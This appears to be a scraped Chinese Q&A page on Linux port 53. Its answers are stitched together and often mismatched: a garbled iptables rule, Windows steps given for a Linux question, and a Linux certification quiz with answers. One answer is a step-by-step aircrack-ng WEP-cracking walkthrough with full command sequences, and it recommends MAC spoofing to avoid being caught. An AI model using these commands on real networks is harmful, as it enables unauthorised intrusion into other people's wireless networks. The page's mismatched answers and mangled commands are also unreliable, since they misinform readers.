linux53
㈠ linux下如何屏蔽埠
埠是linux下應用軟體因需要而開啟的socket套接字,具有唯一性。埠可以查看、啟動關閉、設置防火牆規則等。
1、埠查看
netstat -tln //表示已數字形式查看,正在監聽的埠
netstat -ap //查看所有應用佔用埠情況
2、啟動停止
埠自己是不會停止和啟動的,需要停止和啟動的是埠對應的應用。
可以先找到埠,再對應PID,命令如下:
netstat -anp|grep 57069 //這個是要找的埠號
lsof -i:57069 //查找器PID信息
第三部殺死進程:圖例裡面沒有在這里寫上,kill -9 PID
3、屏蔽
linux下一般使用防火牆的filter規則 定義允許或者不允許進行屏蔽。對於filter一般只能做在3個鏈上:INPUT ,FORWARD ,OUTPUT。
例如設置在輸入端屏蔽53埠:
iptables-AINPUT1-d172.16.100.1-pudp--dport53-jREJECT
-A是增加規則,-d:表示匹配目標地址,-pudp表示UPD協議,--dPort 是埠53
這里表示在輸入端目的地址是172.16.100.1的53埠被屏蔽
㈡ ubuntu linux系統下如何關閉53埠,或者說有他有對應的服務沒找到,求高手解答。 系統做安全配置
/etc/service 文件 進去找到53埠 刪掉
在重啟網路服務
service networking restart
㈢ linux怎麼開啟抓包tcp 53
Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始終不能在win下抓包,所以只能 棄 Windows 從Linux 了,另外 Windows 下掃描到的 AP 也比 Linux 下少了很多。其實 Windows 並不完整的支持 TCP/IP 協議族,有些協議Windows 直接丟棄不用。網路本來從一開始就是 Unix 的天下,Windows 只是在後來加入了網路的功能。 Aircrack-ng工具包有很多工具,我用到的工具主要有以下幾個: airmon-ng 處理網卡工作模式 airomp-ng 抓包 aircrack-ng 破解 aireplay-ng 發包,干擾 另外還要用到以下 linux 命令: ifconfig 查看修改網卡狀態和參數 macchanger 偽造 MAC iwconfig 主要針對無線網卡的工具 (同 ifconfig) iwlist 獲取無線網路的更詳細信息 另外還有其他的 linux 基本命令,我就不提示了。 具體破解步驟: 1. 修改無線網卡狀態:先 dow 2. 偽造無線網卡的 MAC 地址:安全起見,減少被抓到的可能 3. 修改網卡工作模式:進入Monitor狀態,會產生一個虛擬的網卡 4. 修改無線網卡狀態: up 5. 查看網路狀態,記錄下 AP 的 MAC 和本機的 MAC ,確定攻擊目標 6. 監聽抓包:生成 .cap 或 .ivs 7. 干擾無線網路:截取無線數據包,發送垃圾數據包,用來獲得更多的有效數據包 8. 破解 .cap 或 .ivs ,獲得 WEP 密碼,完成破解 Crack Mode一共有5種請酌情使用還有網卡不一定是ath1也有可能是wifi0,ath0等等 ifconfig -a ifconfig -a ath0 up airmon-ng start wifi0 6 airomp-ng --ivs -w 目標路由器IVS文件 -c 6 ath1 airomp-ng ath1 aireplay-ng -1 0 -e 目標路由器SSID -a 目標MAC -h 本機MAC ath1 ----------- -2 Crack Mode----------- aireplay-ng -2 -p 0841 -c ffffffffffff -b 目標MAC -h 本機MAC ath1 ----------- -3 Crack Mode----------- aireplay-ng -3 -b 目標MAC -h 本機MAC ath1 ----------- -4 Crack Mode----------- aireplay-ng -4 -b 目標MAC -h 本機MAC ath1 packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 ----------- -5 Crack Mode----------- aireplay-ng -5 -b 目標MAC -h 本機MAC ath1 packetforge-ng -0 -a 目標MAC -h 本機MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp aireplay-ng -2 -r MyArp -x 256 ath1 -----------Crack Key----------- aircrack-ng -n 64 -b 目標MAC 目標路由器IVS文件-01.ivs —————————————————————————————— 下面詳細介紹一下各個命令的基本用法(參照命令的英文說明) 1. ifconfig 用來配置網卡,我們這里主要用來 禁用和啟用 網卡: ifconfig ath0 down ifconfig ath0 up 禁用一下網卡的目的是為了下一步修改 MAC 。 2.macchanger 用來改變網卡的 MAC 地址,具體用法如下: usage: macchanger [options] device -h 顯示幫助 -V 顯示版本 -s 顯示當前MAC -e 不改變mac,使用硬體廠商寫入的MAC -a 自動生成一個同類型的MAC,同廠商的 -A 自動生成一個不同類型的MAC,不同廠商的 -r 生成任意MAC -l 顯示已知廠商的網卡MAC地址分配,這個很有用,可以根據MAC查出來是哪個廠商生產的產品 -m 設置一個自定義的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。 3.airmon-ng 啟動無線網卡進入 Monitor 模式, useage: airmon-ng <startstopcheck> <interface> [channel] <startstopcheck>啟動,停止,檢測 <interface>指定無線網卡 [channel] 監聽頻道,現代大多數無線路由默認是 6,隨便掃描一下都是這個頻道,網管們應該換換了 4.iwconfig 專用的無線網卡配置工具,用來配置特殊的網路信息,不帶參數時顯示可用網路。 useage:iwconfig interface [options] [essid{NNONOFF}] 指定essid號 開啟關閉 [nwid{NNonoff}] 指定網路id號 開啟關閉 [mode {managedad-hoc....}] 指定無線網路工作模式/類型 [freq N.NNNN[KMG]] 指定工作頻率 [channel N] 指定頻道 [ap {Noffauto}] 指定AP號 關閉/自動 [sens N] sens 號 [nick N] nick 號 [rate {Nautofixed}] 速率控制 [rts {Nautofixedoff}] rts控制,如果不知道什麼是RTS,那就回去好好去學網路,不用往下看了 [frag {Nautofixedoff}] 碎片控制 [enc {NNNN-NNNNoff}] 范圍 [power {period Ntimeout N}] 電源 頻率/超時 [retry {limit Nlifetime N}] 重試 限次/超時 [txpower N{mwdBm}] 功率 毫瓦/分貝 [commit] 處理 5.iwlist 主要用來顯示無線網卡的一些附加信息,同上 useage: iwlist [interface] options scanning 掃描 frequency 頻率 channel 頻道 bitrate 速率 rate 速率 encryption 加密 key 密鑰 power 電源 txpower 功率 ap ap accespoints ap peers 直連 event 事件 6.airomp-ng 抓包工具,我最喜歡用的,詳細用法如下: usage: airomp-ng <options> <interface>[,<interface>,...] Options: --ivs :僅將抓取信息保存為 .ivs --gpsd :使用 GPSd --write <prefix> :保存為指定日文件名,我一般用這個,尤其是多個網路時,指定了也好區分 -w :同 --write --beacons :保存所有的 beacons ,默認情況況下是丟棄那些無用的數據包的 --update <secs> :顯示更新延遲,沒有用過 --showack :顯示ack/cts/rts狀態,還是那句,不知道rts就不用看了 -h :隱藏已知的,配合上面的選項使用 -f <msecs> :跳頻時間 --berlin <secs> :無數據包接收時延遲顯示的時間,這句不太好翻譯,意思是當那個信號發出設備沒有發出數據包多少時間之後,就停止對它的監視.默認120秒.建議學好英文去讀原文,翻譯的都會有出入,這是我的理解.(mhy_mhy注) -r <file> :從指定的文件讀取數據包.我也想有人給我抓好包放哪裡,呵呵 Filter options: --encrypt <suite> : 使用密碼序列過濾 AP --netmask <netmask> : 使用掩碼過濾 AP --bssid <bssid> : 使用 bssid 過濾 AP -a : 過濾無關的客戶端 默認情況下使用2.4Ghz,你也可以指定其他的頻率,通過以下命令操作: --channel <channels>:指定頻道 --band <abg> :制定帶寬 -C <frequencies> :指定頻率MHz --cswitch <method> : 設置頻道交換方式 0 : FIFO (default) 先進先出(默認) 1 : Round Robin 循環 2 : Hop on last 最後一跳 -s : 同上 --help : 顯示使用方法,翻譯到這里,感覺還是英文的貼切一點,建議讀原文 7.aireplay-ng
㈣ Linux中安裝envi53許可證license
許可證是針對特定用戶cs的,可能不是針對機器中所有用戶的。
㈤ linux中允許訪問TCP與UDP協議的53號埠,該如何進行設置
1、點擊[屬性]按鈕,彈出逗本地連接屬性地,選擇逗此連接使用下列項目地中的逗Internet協議(TCP/IP)地,然後點擊[屬性]按鈕。
2、在彈出的逗Internet協議(TCP/IP)地對話框中點擊[高級]按鈕。在彈出的逗高級TCP/IP設置地中,選擇逗選項地標簽,選中逗TCP/IP篩選地,然後點擊[屬性]按鈕。
3、在彈出的逗TCP/IP篩選地對話框里選擇逗啟用TCP/IP篩選地的復選框,然後把左邊逗TCP埠地上的逗只允許地選上(請見附圖)。
這樣,您就可以來自己添加或刪除您的TCP或UDP或IP的各種埠了。添加或者刪除完畢,重新啟動機器
㈥ linux認證的面試題及答案
linux認證的面試題及答案
Linux認證指獲得專業Linux培訓後通過考試得到的資格。國際上廣泛承認的Linux認證有LinuxProfessionalInstitute(簡稱為LPI)、SairLinux和GNU、Linux+和RedHatCertifiedEngineer。不過,想要考取這個證書也不是容易的事情,本次我我大家帶來了linux認證面試題及答案希望能夠幫助道大家。
一、填空題:
1. 在Linux系統中,以 文件 方式訪問設備 。
2. Linux內核引導時,從文件 /etc/fstab 中讀取要載入的文件系統。
3. Linux文件系統中每個文件用 i節點 來標識。
4. 全部磁碟塊由四個部分組成,分別為引導塊 、專用塊 、 i節點表塊 和數據存儲塊。
5. 鏈接分為: 硬鏈接 和 符號鏈接 。
6. 超級塊包含了i節點表 和 空閑塊表 等重要的文件系統信息。
7. 某文件的許可權為:drw-r--r--,用數值形式表示該許可權,則該八進制數為: 644 ,該文件屬性是 目錄 。
8. 前台起動的進程使用 Ctrl+c 終止。
9. 靜態路由設定後,若網路拓撲結構發生變化,需由系統管理員修改路由的設置。
10. 網路管理的重要任務是: 控制 和 監控 。
11. 安裝Linux系統對硬碟分區時,必須有兩種分區類型: 文件系統分區 和 交換分區 。
13. 編寫的Shell程序運行前必須賦予該腳本文件 執行 許可權。
14. 系統管理的任務之一是能夠在 分布式 環境中實現對程序和數據的安全保護、備份、恢復和更新。
15. 系統交換分區是作為系統 虛擬存儲器 的一塊區域。
16. 內核分為 進程管理系統 、 內存管理系統 、 I/O管理系統 和文件管理系統 等四個子系統。
17. 內核配置是系統管理員在改變系統配置 硬體 時要進行的重要操作。
18. 在安裝Linux系統中,使用netconfig程序對網路進行配置,該安裝程序會一步步提示用戶輸入主機名、域名、域名伺服器、IP地址、 網關地址 和
子網掩碼 等必要信息。
19. 唯一標識每一個用戶的是用戶 ID 和用戶名。
20 . RIP 協議是最為普遍的一種內部協議,一般稱為動態路由選擇協議。
21. 在Linux系統中所有內容都被表示為文件,組織文件的各種方法稱為 文件系統 。
22. DHCP可以實現動態 IP 地址分配。
23. 系統網路管理員的管理對象是伺服器、 用戶 和伺服器的進程 以及系統的各種資源。
24. 網路管理通常由監測、傳輸和管理三部分組成,其中管理部分是整個網路管理的中心。
25. 當想刪除本系統用不上的 設備驅動程序 時必須編譯內核,當內核不支持系統上的 設備驅動程序 時,必須對內核 升級 。
26 Ping命令可以測試網路中本機系統是否能到達 一台遠程主機 ,所以常常用於測試網路的 連通性 。
27. vi編輯器具有兩種工作模式: 命令模式 和 輸入模式 。
28. 可以用ls –al命令來觀察文件的許可權,每個文件的許可權都用10位表示,並分為四段,其中第一段占 1 位,表示 文件類型 ,第二段佔3位,表示 文
件所有者 對該文件的許可權。
29. 進程與程序的區別在於其動態性,動態的產生和終止,從產生到終止進程可以具有的基本狀態為: 運行態 、 就緒態 和 等待態(阻塞態) 。
30. DNS實際上是分布在internet上的主機信息的資料庫,其作用是實現 IP地址和主機名 之間的轉換。
31. Apache是實現WWW伺服器功能的應用程序,即通常所說的「瀏覽web伺服器」,在伺服器端 為用戶提供瀏覽 web服務 的就是apache應用程序。
32. 在Linux系統上做備份可以有兩種類型:系統備份 和 用戶備份 。其中前者是指對 操作系統 的備份,後者是指對 應用程序和用戶文件的備份。
33. CD-ROM標準的文件系統類型是 iso9660 。
34. 當lilo.conf配置完畢後,使之生效,應運行的命令及參數是 lilo 。
35. 在使用ls命令時,用八進制形式顯示非列印字元應使用參數 -b 。
36. Linux使用支持Windows 9.x/2000長文件名的文件系統的類型是 vfat 。
37. 設定限制用戶使用磁碟空間的命令是 quota 。
38 在Linux系統中,用來存放系統所需要的配置文件和子目錄的目錄是 /etc 。
39. 硬連接只能建立對 文件 鏈接。符號鏈接可以跨不同文件系統創建。
40. 套接字文件的屬性位是 s 。
41. 結束後台進程的命令是 kill 。
42. 進程的運行有兩種方式,即 獨立運行和使用父進程運行 。
43. Links分為 硬鏈接和符號鏈接 。
44. 在超級用戶下顯示Linux系統中正在運行的全部進程,應使用的命令及參數是 ps -aux 。
45. 管道文件的屬性位是 p 。
46. 將前一個命令的標准輸出作為後一個命令的標准輸入,稱之為 管道 。
47. 為腳本程序指定執行權的命令及參數是 chmod a+x filename 。
48. 進行遠程登錄的命令是 telnet 。
49. 欲發送10個分組報文測試與主機abc.tuu.e.cn的連通性,應使用的命令和參數是: ping abc.tuu.e.cn –c 10 。
50. DNS伺服器的進程命名為named,當其啟動時,自動裝載 /etc目錄下的 named.conf 文件中定義的DNS分區資料庫文件。
51. Apache伺服器進程配置文件是 httpd.conf 。
52.在 Linux系統中,壓縮文件後生成後綴為.gz文件的命令是 gzip 。
53. 在用vi編輯文件時,將文件內容存入test.txt文件中,應在命令模式下鍵入 :w test.txt 。
54 可以在標准輸出上顯示整年日歷的命令及參數是 cal -y 。
55. 在shell編程時,使用方括弧表示測試條件的規則是:方括弧兩邊必須有 空格 。
56. 檢查已安裝的文件系統/dev/had5是否正常,若檢查有錯,則自動修復,其命令及參數是 fsck –a /dev/had5 。
57. 在Windows9.x環境下共享Unix/Linux中的用戶目錄的一個工具是 Samba伺服器 。
58. 系統管理員的職責是進行系統資源管理、系統性能管理、設備管理、安全管理和 系統性能監測 。
59 在Linux系統中,測試DNS伺服器是否能夠正確解析域名的的客戶端命令,使用命令 nslookup 。
60. 在Linux系統下,第二個IDE通道的硬碟(從盤)被標識為 hdb 。
61. 當系統管理員需升級內核版本和改變系統硬體配置時,應 重新編譯內核 。
62. 如果只是要修改系統的IP地址,應修改 /etc/rc.d/rc.inet1 配置文件。
63. 當LAN內沒有條件建立DNS伺服器,但又想讓區域網內的用戶可以使用計算機名互相訪問時,應配置 /etc/hosts 文件。
64. 在vi編輯環境下,使用 Esc鍵 進行模式轉換。
65. Slackware Linux 9.0通常使用 ext3 文件系統,系統的全部磁碟塊由 四 部分組成。
66. 將/home/stud1/wang目錄做歸檔壓縮,壓縮後生成wang.tar.gz文件,並將此文件保存到/home目錄下,實現此任務的tar命令格式 tar zcvf
/home/wang.tar.gz /home/stud1/wang 。
67. 管道就是將前一個命令的 標准輸出 作為後一個命令的 標准輸入 。
68. 在使用手工的方法配置網路時,可通過修改 /etc/HOSTNAME 文件來改變主機名,若要配置該計算機的域名解析客戶端,需配置 /etc/resolv.conf
文件。
69. 啟動進程有手動啟動和調度啟動兩種方法,其中調度啟動常用的命令為 at 、 batch 和 crontab 。
70. test.bns.com.cn的域名是 bns.com.cn ,如果要配置一域名伺服器,應在 named.conf 文件中定義DNS資料庫的工作目錄。
71. Sendmail郵件系統使用的兩個主要協議是: SMTP 和 POP ,前者用來發送郵件,後者用來接收郵件。
72. DHCP是動態主機配置協議的簡稱,其作用是:為網路中的主機分配IP地址 。
73. 目前代理伺服器使用的軟體包有很多種,教材中使用的是 squid 。
74. rm命令可刪除文件或目錄,其主要差別就是是否使用遞歸開關 -r或-R 。
75. mv 命令可以移動文件和目錄,還可以為文件和目錄重新命名。
76. 路由選擇協議(RIP)的跳數表示到達目的地之前必須通過的 網關 數,RIP接受的最長距離是 15跳 。
77. ping命令用於測試網路的連通性,ping命令通過 ICMP 協議來實現。
78. nfs 協議用於實現Unix(/linux)主機之間的文件系統共享。
79. 在Linux操作系統中,設備都是通過特殊的 文件 來訪問。
80. shell不僅是 用戶命令的解釋器 ,它同時也是一種功能強大的編程語言。 bash是Linux的預設shell。
81. 用 >;>; 符號將輸出重定向內容附加在原文的後面。
82. 增加一個用戶的命令是:adser 或useradd 。
83 進行字元串查找,使用grep命令。
84. 使用 * 每次匹配若干個字元。
85. /sbin 目錄用來存放系統管理員使用的管理程序。
二、單項選擇題:
1. 下面的網路協議中,面向連接的的協議是: A 。
A 傳輸控制協議 B 用戶數據報協議 C 網際協議 D 網際控制報文協議
2. 在/etc/fstab文件中指定的文件系統載入參數中, D 參數一般用於CD-ROM等移動設備。
A defaults B sw C rw和ro D noauto
3. Linux文件許可權一共10位長度,分成四段,第三段表示的內容是 C 。
A 文件類型 B 文件所有者的許可權
C 文件所有者所在組的許可權 D 其他用戶的許可權
4. 終止一個前台進程可能用到的命令和操作 B 。
A kill B ;+C C shut down D halt
5.在使用mkdir命令創建新的目錄時,在其父目錄不存在時先創建父目錄的選項是 D 。
A -m B -d C -f D -p
6. 下面關於i節點描述錯誤的是 A 。
A i節點和文件是一一對應的
B i節點能描述文件佔用的塊數
C i節點描述了文件大小和指向數據塊的指針
D 通過i節點實現文件的邏輯結構和物理結構的轉換
7. 一個文件名字為rr.Z,可以用來解壓縮的命令是: D 。
A tar B gzip C compress D uncompress
8. 具有很多C語言的功能,又稱過濾器的是 C 。
A csh
B tcsh
C awk
D sed
9. 一台主機要實現通過區域網與另一個區域網通信,需要做的工作是 C 。
A 配置域名伺服器
B 定義一條本機指向所在網路的路由
C 定義一條本機指向所在網路網關的路由
D 定義一條本機指向目標網路網關的路由
10. 建立動態路由需要用到的文件有 D 。
A /etc/hosts B /etc/HOSTNAME C /etc/resolv.conf D /etc/gateways
11. 區域網的網路地址192.168.1.0/24,區域網絡連接其它網路的網關地址是192.168.1.1。主機192.168.1.20訪問172.16.1.0/24網路時,其路由設置
正確的是 B 。
A route add –net 192.168.1.0 gw 192.168.1.1 netmask 255.255.255.0 metric 1
B route add –net 172.16.1.0 gw 192.168.1.1 netmask 255.255.255.255 metric 1
C route add –net 172.16.1.0 gw 172.16.1.1 netmask 255.255.255.0 metric 1
D route add default 192.168.1.0 netmask 172.168.1.1 metric 1
12. 下列提法中,不屬於ifconfig命令作用范圍的是 D 。
A 配置本地回環地址 B 配置網卡的IP地址
C 激活網路適配器 D 載入網卡到內核中
13. 下列關於鏈接描述,錯誤的是 B 。
A 硬鏈接就是讓鏈接文件的i節點號指向被鏈接文件的i節點
B 硬鏈接和符號連接都是產生一個新的i節點
C 鏈接分為硬鏈接和符號鏈接 D 硬連接不能鏈接目錄文件
14. 在區域網絡內的某台主機用ping命令測試網路連接時發現網路內部的主機都可以連同,而不能與公網連通,問題可能是 C。